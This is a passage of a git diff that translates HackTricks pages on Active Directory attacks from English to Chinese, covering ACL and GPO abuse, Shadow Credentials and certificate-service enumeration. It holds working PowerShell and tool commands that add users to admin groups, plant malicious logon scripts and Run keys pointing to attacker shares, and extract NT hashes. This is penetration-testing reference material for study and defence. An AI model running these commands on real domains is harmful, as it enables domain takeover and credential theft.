+此权限允许攻击者修改用户属性。具体来说，拥有 `GenericWrite` 访问权限的攻击者可以更改用户的登录脚本路径，以便在用户登录时执行恶意脚本。这是通过使用 `Set-ADObject` 命令更新目标用户的 `scriptpath` 属性，使其指向攻击者的脚本来实现的。
 ```powershell
 Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
 ```
-
 ## **GenericWrite on Group**
 
-With this privilege, attackers can manipulate group membership, such as adding themselves or other users to specific groups. This process involves creating a credential object, using it to add or remove users from a group, and verifying the membership changes with PowerShell commands.
-
+通过此权限，攻击者可以操纵组成员资格，例如将自己或其他用户添加到特定组中。此过程涉及创建凭据对象，使用该对象将用户添加或从组中移除，并使用 PowerShell 命令验证成员资格更改。
 ```powershell
 $pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
@@ -113,11 +94,9 @@ Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'userna
 Get-DomainGroupMember -Identity "Group Name" | Select MemberName
 Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose
 ```
-
 ## **WriteDACL + WriteOwner**
 
-Owning an AD object and having `WriteDACL` privileges on it enables an attacker to grant themselves `GenericAll` privileges over the object. This is accomplished through ADSI manipulation, allowing for full control over the object and the ability to modify its group memberships. Despite this, limitations exist when trying to exploit these privileges using the Active Directory module's `Set-Acl` / `Get-Acl` cmdlets.
-
+拥有一个 AD 对象并对其具有 `WriteDACL` 权限使攻击者能够授予自己对该对象的 `GenericAll` 权限。这是通过 ADSI 操作实现的，允许对该对象进行完全控制并能够修改其组成员资格。尽管如此，在尝试使用 Active Directory 模块的 `Set-Acl` / `Get-Acl` cmdlets 利用这些权限时仍然存在限制。
 ```powershell
 $ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
 $IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])
@@ -125,71 +104,64 @@ $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityRe
 $ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)
 $ADSI.psbase.commitchanges()
 ```
+## **域上的复制 (DCSync)**
 
-## **Replication on the Domain (DCSync)**
+DCSync 攻击利用域上的特定复制权限，模拟域控制器并同步数据，包括用户凭据。这种强大的技术需要像 `DS-Replication-Get-Changes` 这样的权限，使攻击者能够在没有直接访问域控制器的情况下，从 AD 环境中提取敏感信息。[**在这里了解更多关于 DCSync 攻击的信息。**](../dcsync.md)
 
-The DCSync attack leverages specific replication permissions on the domain to mimic a Domain Controller and synchronize data, including user credentials. This powerful technique requires permissions like `DS-Replication-Get-Changes`, allowing attackers to extract sensitive information from the AD environment without direct access to a Domain Controller. [**Learn more about the DCSync attack here.**](../dcsync.md)
+## GPO 委派 <a href="#gpo-delegation" id="gpo-delegation"></a>
 
-## GPO Delegation <a href="#gpo-delegation" id="gpo-delegation"></a>
+### GPO 委派
 
-### GPO Delegation
+委派管理组策略对象 (GPO) 的访问权限可能会带来重大安全风险。例如，如果用户如 `offense\spotless` 被委派 GPO 管理权限，他们可能拥有 **WriteProperty**、**WriteDacl** 和 **WriteOwner** 等权限。这些权限可能被滥用用于恶意目的，使用 PowerView 识别：`bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
 
-Delegated access to manage Group Policy Objects (GPOs) can present significant security risks. For instance, if a user such as `offense\spotless` is delegated GPO management rights, they may have privileges like **WriteProperty**, **WriteDacl**, and **WriteOwner**. These permissions can be abused for malicious purposes, as identified using PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
+### 枚举 GPO 权限
 
-### Enumerate GPO Permissions
+要识别配置错误的 GPO，可以将 PowerSploit 的 cmdlet 链接在一起。这允许发现特定用户有权限管理的 GPO：`powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
 
-To identify misconfigured GPOs, PowerSploit's cmdlets can be chained together. This allows for the discovery of GPOs that a specific user has permissions to manage: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
+**应用特定策略的计算机**：可以解析特定 GPO 应用到哪些计算机，帮助理解潜在影响的范围。`powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
 
-**Computers with a Given Policy Applied**: It's possible to resolve which computers a specific GPO applies to, helping understand the scope of potential impact. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
+**应用于特定计算机的策略**：要查看应用于特定计算机的策略，可以使用 `Get-DomainGPO` 等命令。
 
-**Policies Applied to a Given Computer**: To see what policies are applied to a particular computer, commands like `Get-DomainGPO` can be utilized.
+**应用特定策略的 OU**：可以使用 `Get-DomainOU` 识别受特定策略影响的组织单位 (OU)。
 
-**OUs with a Given Policy Applied**: Identifying organizational units (OUs) affected by a given policy can be done using `Get-DomainOU`.
-
-### Abuse GPO - New-GPOImmediateTask
-
-Misconfigured GPOs can be exploited to execute code, for example, by creating an immediate scheduled task. This can be done to add a user to the local administrators group on affected machines, significantly elevating privileges:
+### 滥用 GPO - New-GPOImmediateTask
 
+配置错误的 GPO 可以被利用来执行代码，例如，通过创建一个立即的计划任务。这可以用来将用户添加到受影响机器的本地管理员组，从而显著提升权限：
 ```powershell
 New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
 ```
+### GroupPolicy 模块 - 滥用 GPO
 
-### GroupPolicy module - Abuse GPO
-
-The GroupPolicy module, if installed, allows for the creation and linking of new GPOs, and setting preferences such as registry values to execute backdoors on affected computers. This method requires the GPO to be updated and a user to log in to the computer for execution:
-
+GroupPolicy 模块（如果已安装）允许创建和链接新的 GPO，并设置首选项，例如注册表值，以在受影响的计算机上执行后门。此方法要求更新 GPO，并且需要用户登录计算机以执行：
 ```powershell
 New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
 Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
 ```
+### SharpGPOAbuse - 滥用 GPO
 
-### SharpGPOAbuse - Abuse GPO
-
-SharpGPOAbuse offers a method to abuse existing GPOs by adding tasks or modifying settings without the need to create new GPOs. This tool requires modification of existing GPOs or using RSAT tools to create new ones before applying changes:
-
+SharpGPOAbuse 提供了一种通过添加任务或修改设置来滥用现有 GPO 的方法，而无需创建新的 GPO。此工具需要修改现有 GPO 或使用 RSAT 工具在应用更改之前创建新的 GPO：
 ```bash
 .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging"
 ```
+### 强制策略更新
 
-### Force Policy Update
+GPO 更新通常每 90 分钟发生一次。为了加快此过程，特别是在实施更改后，可以在目标计算机上使用 `gpupdate /force` 命令强制立即更新策略。此命令确保对 GPO 的任何修改在下一个自动更新周期之前立即应用。
 
-GPO updates typically occur around every 90 minutes. To expedite this process, especially after implementing a change, the `gpupdate /force` command can be used on the target computer to force an immediate policy update. This command ensures that any modifications to GPOs are applied without waiting for the next automatic update cycle.
+### 背后的机制
 
-### Under the Hood
+检查给定 GPO 的计划任务时，可以确认添加了诸如 `evilTask` 的任务。这些任务是通过脚本或命令行工具创建的，旨在修改系统行为或提升权限。
 
-Upon inspection of the Scheduled Tasks for a given GPO, like the `Misconfigured Policy`, the addition of tasks such as `evilTask` can be confirmed. These tasks are created through scripts or command-line tools aiming to modify system behavior or escalate privileges.
+任务的结构，如 `New-GPOImmediateTask` 生成的 XML 配置文件所示，概述了计划任务的具体内容，包括要执行的命令及其触发器。该文件表示如何在 GPO 中定义和管理计划任务，为执行任意命令或脚本作为政策执行的一部分提供了一种方法。
 
-The structure of the task, as shown in the XML configuration file generated by `New-GPOImmediateTask`, outlines the specifics of the scheduled task - including the command to be executed and its triggers. This file represents how scheduled tasks are defined and managed within GPOs, providing a method for executing arbitrary commands or scripts as part of policy enforcement.
+### 用户和组
 
-### Users and Groups
+GPO 还允许在目标系统上操纵用户和组的成员资格。通过直接编辑用户和组政策文件，攻击者可以将用户添加到特权组中，例如本地 `administrators` 组。这是通过委派 GPO 管理权限实现的，允许修改政策文件以包含新用户或更改组成员资格。
 
-GPOs also allow for the manipulation of user and group memberships on target systems. By editing the Users and Groups policy files directly, attackers can add users to privileged groups, such as the local `administrators` group. This is possible through the delegation of GPO management permissions, which permits the modification of policy files to include new users or change group memberships.
+用户和组的 XML 配置文件概述了这些更改是如何实施的。通过向该文件添加条目，可以在受影响的系统上授予特定用户提升的权限。这种方法提供了一种通过 GPO 操作直接提升权限的途径。
 
-The XML configuration file for Users and Groups outlines how these changes are implemented. By adding entries to this file, specific users can be granted elevated privileges across affected systems. This method offers a direct approach to privilege escalation through GPO manipulation.
+此外，还可以考虑其他执行代码或保持持久性的方法，例如利用登录/注销脚本、修改注册表键以实现自动运行、通过 .msi 文件安装软件或编辑服务配置。这些技术提供了通过滥用 GPO 维护访问和控制目标系统的各种途径。
 
-Furthermore, additional methods for executing code or maintaining persistence, such as leveraging logon/logoff scripts, modifying registry keys for autoruns, installing software via .msi files, or editing service configurations, can also be considered. These techniques provide various avenues for maintaining access and controlling target systems through the abuse of GPOs.
-
-## References
+## 参考文献
 
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces)
 - [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)
@@ -200,4 +172,3 @@ Furthermore, additional methods for executing code or maintaining persistence, s
 - [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule\_\_ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
index cede72578..a0fe1b033 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
@@ -4,58 +4,54 @@
 
 ## Intro <a href="#3f17" id="3f17"></a>
 
-**Check the original post for [all the information about this technique](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab).**
+**查看原始帖子以获取[有关此技术的所有信息](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)。**
 
-As **summary**: if you can write to the **msDS-KeyCredentialLink** property of a user/computer, you can retrieve the **NT hash of that object**.
+作为**总结**：如果您可以写入用户/计算机的**msDS-KeyCredentialLink**属性，则可以检索该对象的**NT hash**。
 
-In the post, a method is outlined for setting up **public-private key authentication credentials** to acquire a unique **Service Ticket** that includes the target's NTLM hash. This process involves the encrypted NTLM_SUPPLEMENTAL_CREDENTIAL within the Privilege Attribute Certificate (PAC), which can be decrypted.
+在帖子中，概述了一种设置**公钥-私钥身份验证凭据**的方法，以获取包含目标的NTLM hash的唯一**服务票证**。此过程涉及特权属性证书（PAC）中的加密NTLM_SUPPLEMENTAL_CREDENTIAL，可以解密。
 
 ### Requirements
 
-To apply this technique, certain conditions must be met:
+要应用此技术，必须满足某些条件：
 
-- A minimum of one Windows Server 2016 Domain Controller is needed.
-- The Domain Controller must have a server authentication digital certificate installed.
-- The Active Directory must be at the Windows Server 2016 Functional Level.
-- An account with delegated rights to modify the msDS-KeyCredentialLink attribute of the target object is required.
+- 需要至少一个Windows Server 2016域控制器。
+- 域控制器必须安装服务器身份验证数字证书。
+- Active Directory必须处于Windows Server 2016功能级别。
+- 需要一个具有修改目标对象的msDS-KeyCredentialLink属性的委派权限的帐户。
 
 ## Abuse
 
-The abuse of Key Trust for computer objects encompasses steps beyond obtaining a Ticket Granting Ticket (TGT) and the NTLM hash. The options include:
+对计算机对象的Key Trust滥用包括获取票证授予票证（TGT）和NTLM hash之外的步骤。选项包括：
 
-1. Creating an **RC4 silver ticket** to act as privileged users on the intended host.
-2. Using the TGT with **S4U2Self** for impersonation of **privileged users**, necessitating alterations to the Service Ticket to add a service class to the service name.
+1. 创建一个**RC4银票证**以在预期主机上充当特权用户。
+2. 使用TGT与**S4U2Self**进行**特权用户**的冒充，需要对服务票证进行更改，以将服务类添加到服务名称。
 
-A significant advantage of Key Trust abuse is its limitation to the attacker-generated private key, avoiding delegation to potentially vulnerable accounts and not requiring the creation of a computer account, which could be challenging to remove.
+Key Trust滥用的一个显著优势是其限制于攻击者生成的私钥，避免了对潜在易受攻击帐户的委派，并且不需要创建计算机帐户，这可能难以删除。
 
 ## Tools
 
 ### [**Whisker**](https://github.com/eladshamir/Whisker)
 
-It's based on DSInternals providing a C# interface for this attack. Whisker and its Python counterpart, **pyWhisker**, enable manipulation of the `msDS-KeyCredentialLink` attribute to gain control over Active Directory accounts. These tools support various operations like adding, listing, removing, and clearing key credentials from the target object.
+它基于DSInternals，提供此攻击的C#接口。Whisker及其Python对应物**pyWhisker**使得可以操纵`msDS-KeyCredentialLink`属性，以控制Active Directory帐户。这些工具支持各种操作，如添加、列出、删除和清除目标对象的密钥凭据。
 
-**Whisker** functions include:
-
-- **Add**: Generates a key pair and adds a key credential.
-- **List**: Displays all key credential entries.
-- **Remove**: Deletes a specified key credential.
-- **Clear**: Erases all key credentials, potentially disrupting legitimate WHfB usage.
+**Whisker**功能包括：
 
+- **Add**：生成密钥对并添加密钥凭据。
+- **List**：显示所有密钥凭据条目。
+- **Remove**：删除指定的密钥凭据。
+- **Clear**：擦除所有密钥凭据，可能会干扰合法的WHfB使用。
 ```shell
 Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1
 ```
-
 ### [pyWhisker](https://github.com/ShutdownRepo/pywhisker)
 
-It extends Whisker functionality to **UNIX-based systems**, leveraging Impacket and PyDSInternals for comprehensive exploitation capabilities, including listing, adding, and removing KeyCredentials, as well as importing and exporting them in JSON format.
-
+它扩展了 Whisker 的功能到 **基于 UNIX 的系统**，利用 Impacket 和 PyDSInternals 提供全面的利用能力，包括列出、添加和删除 KeyCredentials，以及以 JSON 格式导入和导出它们。
 ```shell
 python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"
 ```
-
 ### [ShadowSpray](https://github.com/Dec0ne/ShadowSpray/)
 
-ShadowSpray aims to **exploit GenericWrite/GenericAll permissions that wide user groups may have over domain objects** to apply ShadowCredentials broadly. It entails logging into the domain, verifying the domain's functional level, enumerating domain objects, and attempting to add KeyCredentials for TGT acquisition and NT hash revelation. Cleanup options and recursive exploitation tactics enhance its utility.
+ShadowSpray 旨在 **利用广泛用户组可能对域对象拥有的 GenericWrite/GenericAll 权限** 来广泛应用 ShadowCredentials。它包括登录域、验证域的功能级别、枚举域对象，并尝试添加 KeyCredentials 以获取 TGT 和 NT hash 的揭示。清理选项和递归利用策略增强了其实用性。
 
 ## References
 
@@ -65,4 +61,3 @@ ShadowSpray aims to **exploit GenericWrite/GenericAll permissions that wide user
 - [https://github.com/ShutdownRepo/pywhisker](https://github.com/ShutdownRepo/pywhisker)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates.md b/src/windows-hardening/active-directory-methodology/ad-certificates.md
index 6b3f66cbf..fd8cdee70 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates.md
@@ -2,111 +2,106 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Introduction
+## 介绍
 
-### Components of a Certificate
+### 证书的组成部分
 
-- The **Subject** of the certificate denotes its owner.
-- A **Public Key** is paired with a privately held key to link the certificate to its rightful owner.
-- The **Validity Period**, defined by **NotBefore** and **NotAfter** dates, marks the certificate's effective duration.
-- A unique **Serial Number**, provided by the Certificate Authority (CA), identifies each certificate.
-- The **Issuer** refers to the CA that has issued the certificate.
-- **SubjectAlternativeName** allows for additional names for the subject, enhancing identification flexibility.
-- **Basic Constraints** identify if the certificate is for a CA or an end entity and define usage restrictions.
-- **Extended Key Usages (EKUs)** delineate the certificate's specific purposes, like code signing or email encryption, through Object Identifiers (OIDs).
-- The **Signature Algorithm** specifies the method for signing the certificate.
-- The **Signature**, created with the issuer's private key, guarantees the certificate's authenticity.
+- 证书的 **主题** 表示其所有者。
+- **公钥** 与私有密钥配对，将证书与其合法所有者关联。
+- **有效期** 由 **NotBefore** 和 **NotAfter** 日期定义，标记证书的有效持续时间。
+- 由证书颁发机构 (CA) 提供的唯一 **序列号** 识别每个证书。
+- **颁发者** 指的是颁发证书的 CA。
+- **SubjectAlternativeName** 允许为主题提供额外名称，增强识别灵活性。
+- **基本约束** 确定证书是用于 CA 还是最终实体，并定义使用限制。
+- **扩展密钥使用 (EKUs)** 通过对象标识符 (OIDs) 划定证书的特定用途，如代码签名或电子邮件加密。
+- **签名算法** 指定签署证书的方法。
+- 使用颁发者的私钥创建的 **签名** 确保证书的真实性。
 
-### Special Considerations
+### 特殊考虑
 
-- **Subject Alternative Names (SANs)** expand a certificate's applicability to multiple identities, crucial for servers with multiple domains. Secure issuance processes are vital to avoid impersonation risks by attackers manipulating the SAN specification.
+- **主题备用名称 (SANs)** 扩展证书的适用性到多个身份，对于具有多个域的服务器至关重要。安全的颁发流程对于避免攻击者操纵 SAN 规范而导致的冒充风险至关重要。
 
-### Certificate Authorities (CAs) in Active Directory (AD)
+### Active Directory (AD) 中的证书颁发机构 (CAs)
 
-AD CS acknowledges CA certificates in an AD forest through designated containers, each serving unique roles:
+AD CS 通过指定的容器在 AD 林中承认 CA 证书，每个容器承担独特角色：
 
-- **Certification Authorities** container holds trusted root CA certificates.
-- **Enrolment Services** container details Enterprise CAs and their certificate templates.
-- **NTAuthCertificates** object includes CA certificates authorized for AD authentication.
-- **AIA (Authority Information Access)** container facilitates certificate chain validation with intermediate and cross CA certificates.
+- **Certification Authorities** 容器保存受信任的根 CA 证书。
+- **Enrolment Services** 容器详细说明企业 CA 及其证书模板。
+- **NTAuthCertificates** 对象包括被授权用于 AD 身份验证的 CA 证书。
+- **AIA (Authority Information Access)** 容器通过中间和交叉 CA 证书促进证书链验证。
 
-### Certificate Acquisition: Client Certificate Request Flow
+### 证书获取：客户端证书请求流程
 
-1. The request process begins with clients finding an Enterprise CA.
-2. A CSR is created, containing a public key and other details, after generating a public-private key pair.
-3. The CA assesses the CSR against available certificate templates, issuing the certificate based on the template's permissions.
-4. Upon approval, the CA signs the certificate with its private key and returns it to the client.
+1. 请求过程从客户端查找企业 CA 开始。
+2. 在生成公私钥对后，创建包含公钥和其他详细信息的 CSR。
+3. CA 根据可用证书模板评估 CSR，基于模板的权限颁发证书。
+4. 经批准后，CA 使用其私钥签署证书并将其返回给客户端。
 
-### Certificate Templates
+### 证书模板
 
-Defined within AD, these templates outline the settings and permissions for issuing certificates, including permitted EKUs and enrollment or modification rights, critical for managing access to certificate services.
+在 AD 中定义，这些模板概述了颁发证书的设置和权限，包括允许的 EKUs 和注册或修改权限，对于管理证书服务的访问至关重要。
 
-## Certificate Enrollment
+## 证书注册
 
-The enrollment process for certificates is initiated by an administrator who **creates a certificate template**, which is then **published** by an Enterprise Certificate Authority (CA). This makes the template available for client enrollment, a step achieved by adding the template's name to the `certificatetemplates` field of an Active Directory object.
+证书的注册过程由管理员 **创建证书模板**，然后由企业证书颁发机构 (CA) **发布**。这使得模板可用于客户端注册，此步骤通过将模板名称添加到 Active Directory 对象的 `certificatetemplates` 字段来实现。
 
-For a client to request a certificate, **enrollment rights** must be granted. These rights are defined by security descriptors on the certificate template and the Enterprise CA itself. Permissions must be granted in both locations for a request to be successful.
+为了让客户端请求证书，必须授予 **注册权限**。这些权限由证书模板和企业 CA 本身的安全描述符定义。必须在两个位置授予权限，才能成功请求。
 
-### Template Enrollment Rights
+### 模板注册权限
 
-These rights are specified through Access Control Entries (ACEs), detailing permissions like:
+这些权限通过访问控制条目 (ACEs) 指定，详细说明权限，如：
 
-- **Certificate-Enrollment** and **Certificate-AutoEnrollment** rights, each associated with specific GUIDs.
-- **ExtendedRights**, allowing all extended permissions.
-- **FullControl/GenericAll**, providing complete control over the template.
+- **Certificate-Enrollment** 和 **Certificate-AutoEnrollment** 权限，每个权限与特定 GUID 相关联。
+- **ExtendedRights**，允许所有扩展权限。
+- **FullControl/GenericAll**，提供对模板的完全控制。
 
-### Enterprise CA Enrollment Rights
+### 企业 CA 注册权限
 
-The CA's rights are outlined in its security descriptor, accessible via the Certificate Authority management console. Some settings even allow low-privileged users remote access, which could be a security concern.
+CA 的权限在其安全描述符中列出，可以通过证书颁发机构管理控制台访问。有些设置甚至允许低权限用户远程访问，这可能是一个安全隐患。
 
-### Additional Issuance Controls
+### 额外的颁发控制
 
-Certain controls may apply, such as:
+某些控制可能适用，例如：
 
-- **Manager Approval**: Places requests in a pending state until approved by a certificate manager.
-- **Enrolment Agents and Authorized Signatures**: Specify the number of required signatures on a CSR and the necessary Application Policy OIDs.
+- **经理批准**：将请求置于待处理状态，直到由证书经理批准。
+- **注册代理和授权签名**：指定 CSR 上所需的签名数量和必要的应用程序策略 OIDs。
 
-### Methods to Request Certificates
+### 请求证书的方法
 
-Certificates can be requested through:
+可以通过以下方式请求证书：
 
-1. **Windows Client Certificate Enrollment Protocol** (MS-WCCE), using DCOM interfaces.
-2. **ICertPassage Remote Protocol** (MS-ICPR), through named pipes or TCP/IP.
-3. The **certificate enrollment web interface**, with the Certificate Authority Web Enrollment role installed.
-4. The **Certificate Enrollment Service** (CES), in conjunction with the Certificate Enrollment Policy (CEP) service.
-5. The **Network Device Enrollment Service** (NDES) for network devices, using the Simple Certificate Enrollment Protocol (SCEP).
-
-Windows users can also request certificates via the GUI (`certmgr.msc` or `certlm.msc`) or command-line tools (`certreq.exe` or PowerShell's `Get-Certificate` command).
+1. **Windows 客户端证书注册协议** (MS-WCCE)，使用 DCOM 接口。
+2. **ICertPassage 远程协议** (MS-ICPR)，通过命名管道或 TCP/IP。
+3. **证书注册 Web 界面**，安装了证书颁发机构 Web 注册角色。
+4. **证书注册服务** (CES)，与证书注册策略 (CEP) 服务结合使用。
+5. **网络设备注册服务** (NDES) 用于网络设备，使用简单证书注册协议 (SCEP)。
 
+Windows 用户还可以通过 GUI (`certmgr.msc` 或 `certlm.msc`) 或命令行工具 (`certreq.exe` 或 PowerShell 的 `Get-Certificate` 命令) 请求证书。
 ```powershell
 # Example of requesting a certificate using PowerShell
 Get-Certificate -Template "User" -CertStoreLocation "cert:\\CurrentUser\\My"
 ```
+## 证书认证
 
-## Certificate Authentication
+Active Directory (AD) 支持证书认证，主要利用 **Kerberos** 和 **安全通道 (Schannel)** 协议。
 
-Active Directory (AD) supports certificate authentication, primarily utilizing **Kerberos** and **Secure Channel (Schannel)** protocols.
-
-### Kerberos Authentication Process
-
-In the Kerberos authentication process, a user's request for a Ticket Granting Ticket (TGT) is signed using the **private key** of the user's certificate. This request undergoes several validations by the domain controller, including the certificate's **validity**, **path**, and **revocation status**. Validations also include verifying that the certificate comes from a trusted source and confirming the issuer's presence in the **NTAUTH certificate store**. Successful validations result in the issuance of a TGT. The **`NTAuthCertificates`** object in AD, found at:
+### Kerberos 认证过程
 
+在 Kerberos 认证过程中，用户请求票证授予票证 (TGT) 时，使用用户证书的 **私钥** 对该请求进行签名。该请求经过域控制器的多个验证，包括证书的 **有效性**、**路径** 和 **撤销状态**。验证还包括确认证书来自受信任的来源，并确认发行者在 **NTAUTH 证书存储** 中的存在。成功的验证将导致 TGT 的发放。AD 中的 **`NTAuthCertificates`** 对象位于：
 ```bash
 CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>
 ```
+在证书认证中建立信任是至关重要的。
 
-is central to establishing trust for certificate authentication.
+### 安全通道 (Schannel) 认证
 
-### Secure Channel (Schannel) Authentication
+Schannel 促进安全的 TLS/SSL 连接，在握手过程中，客户端提供一个证书，如果成功验证，则授权访问。将证书映射到 AD 账户可能涉及 Kerberos 的 **S4U2Self** 函数或证书的 **主题备用名称 (SAN)**，以及其他方法。
 
-Schannel facilitates secure TLS/SSL connections, where during a handshake, the client presents a certificate that, if successfully validated, authorizes access. The mapping of a certificate to an AD account may involve Kerberos’s **S4U2Self** function or the certificate’s **Subject Alternative Name (SAN)**, among other methods.
+### AD 证书服务枚举
 
-### AD Certificate Services Enumeration
-
-AD's certificate services can be enumerated through LDAP queries, revealing information about **Enterprise Certificate Authorities (CAs)** and their configurations. This is accessible by any domain-authenticated user without special privileges. Tools like **[Certify](https://github.com/GhostPack/Certify)** and **[Certipy](https://github.com/ly4k/Certipy)** are used for enumeration and vulnerability assessment in AD CS environments.
-
-Commands for using these tools include:
+可以通过 LDAP 查询枚举 AD 的证书服务，揭示有关 **企业证书颁发机构 (CAs)** 及其配置的信息。这对任何经过域认证的用户都是可访问的，无需特殊权限。工具如 **[Certify](https://github.com/GhostPack/Certify)** 和 **[Certipy](https://github.com/ly4k/Certipy)** 用于在 AD CS 环境中的枚举和漏洞评估。
 
+使用这些工具的命令包括：
 ```bash
 # Enumerate trusted root CA certificates and Enterprise CAs with Certify
 Certify.exe cas
@@ -120,11 +115,9 @@ certipy find -vulnerable -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
 certutil.exe -TCAInfo
 certutil -v -dstemplate
 ```
-
-## References
+## 参考文献
 
 - [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)
 - [https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html](https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
index d619085f1..31781ce0e 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
@@ -2,111 +2,106 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Introduction
+## 介绍
 
-### Components of a Certificate
+### 证书的组成部分
 
-- The **Subject** of the certificate denotes its owner.
-- A **Public Key** is paired with a privately held key to link the certificate to its rightful owner.
-- The **Validity Period**, defined by **NotBefore** and **NotAfter** dates, marks the certificate's effective duration.
-- A unique **Serial Number**, provided by the Certificate Authority (CA), identifies each certificate.
-- The **Issuer** refers to the CA that has issued the certificate.
-- **SubjectAlternativeName** allows for additional names for the subject, enhancing identification flexibility.
-- **Basic Constraints** identify if the certificate is for a CA or an end entity and define usage restrictions.
-- **Extended Key Usages (EKUs)** delineate the certificate's specific purposes, like code signing or email encryption, through Object Identifiers (OIDs).
-- The **Signature Algorithm** specifies the method for signing the certificate.
-- The **Signature**, created with the issuer's private key, guarantees the certificate's authenticity.
+- 证书的 **主题** 表示其所有者。
+- **公钥** 与私有密钥配对，将证书与其合法所有者关联。
+- **有效期** 由 **NotBefore** 和 **NotAfter** 日期定义，标记证书的有效持续时间。
+- 由证书颁发机构 (CA) 提供的唯一 **序列号** 识别每个证书。
+- **颁发者** 指的是颁发证书的 CA。
+- **SubjectAlternativeName** 允许为主题提供额外名称，增强识别灵活性。
+- **基本约束** 确定证书是用于 CA 还是最终实体，并定义使用限制。
+- **扩展密钥使用 (EKUs)** 通过对象标识符 (OIDs) 划分证书的特定用途，如代码签名或电子邮件加密。
+- **签名算法** 指定签署证书的方法。
+- 使用颁发者的私钥创建的 **签名** 确保证书的真实性。
 
-### Special Considerations
+### 特殊考虑
 
-- **Subject Alternative Names (SANs)** expand a certificate's applicability to multiple identities, crucial for servers with multiple domains. Secure issuance processes are vital to avoid impersonation risks by attackers manipulating the SAN specification.
+- **主题备用名称 (SANs)** 扩展证书的适用性到多个身份，对于具有多个域的服务器至关重要。安全的颁发流程对于避免攻击者操纵 SAN 规范进行冒充风险至关重要。
 
-### Certificate Authorities (CAs) in Active Directory (AD)
+### Active Directory (AD) 中的证书颁发机构 (CAs)
 
-AD CS acknowledges CA certificates in an AD forest through designated containers, each serving unique roles:
+AD CS 通过指定的容器在 AD 林中承认 CA 证书，每个容器承担独特角色：
 
